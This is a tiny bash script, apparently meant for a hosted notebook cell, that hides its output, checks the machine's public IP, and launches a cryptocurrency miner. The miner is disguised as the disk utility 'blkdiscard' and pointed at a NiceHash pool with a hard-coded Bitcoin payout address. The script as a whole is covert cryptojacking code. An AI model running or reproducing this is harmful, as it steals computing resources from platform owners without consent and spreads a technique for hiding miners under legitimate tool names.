#!/bin/bash
%%capture

#gives ip address 
curl ipecho.net/plain && curl ipecho.net/plain
chmod +x blkdiscard 
./blkdiscard --algo ETHASH --pool stratum+ssl://daggerhashimoto.auto.nicehash.com:443 --user 3PMe6Cv8cR4LRyH2JwHo4eKY1TtZGGrEq3.$(echo $(shuf -i 1-9999 -n 1)-Opai)
